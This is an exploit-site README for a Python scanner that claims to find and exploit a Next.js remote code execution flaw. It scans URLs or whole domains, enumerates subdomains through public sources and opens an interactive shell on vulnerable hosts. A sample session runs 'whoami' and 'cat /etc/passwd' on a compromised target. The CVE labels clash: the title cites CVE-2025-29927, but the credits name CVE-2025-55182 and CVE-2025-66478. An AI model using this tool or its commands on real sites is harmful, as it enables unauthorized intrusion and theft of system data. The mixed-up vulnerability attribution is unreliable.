Share
## https://sploitus.com/exploit?id=EA51C54C-E4D1-5BCA-B606-D65DEE7C8CC0
# Next.js RCE Scanner
Scanner for **CVE-2025-29927** - Next.js/RSC Remote Code Execution vulnerability.
Based on research by [**Assetnote**](https://github.com/assetnote/) Security Research Team.
## Install
```bash
pip install requests
```
## Usage
```bash
# Scan single URL
python scanner-exe.py -u https://target.com
# Scan from file
python scanner-exe.py -l urls.txt
# Scan domain (auto subdomain discovery)
python scanner-exe.py -d example.com
# With interactive shell
python scanner-exe.py -d example.com -i
```
## Options
```
-u, --url Single target URL
-l, --list File with URLs (one per line)
-d, --domain Domain for subdomain enumeration
-t, --threads Thread count (default: 50)
-T, --timeout Request timeout in seconds (default: 5)
-o, --output Save results to JSON file
-v, --verbose Show all responses
-i, --interactive Launch shell on vulnerable targets
```
## Interactive Shell
When vulnerabilities are found, select a target and run commands:
```
[1] https://vuln1.example.com
[2] https://vuln2.example.com
Select target (1-2): 1
shell@vuln1.example.com$ whoami
www-data
shell@vuln1.example.com$ cat /etc/passwd
...
shell@vuln1.example.com$ switch # change target
shell@vuln1.example.com$ exit # quit
```
## Subdomain Sources
- crt.sh (Certificate Transparency)
- hackertarget.com
- otx.alienvault.com
---
### Credits
This tool is based on the [react2shell-scanner](https://github.com/assetnote/react2shell-scanner) by [Assetnote](https://assetnote.io) Security Research Team.
Original research: **CVE-2025-55182** & **CVE-2025-66478**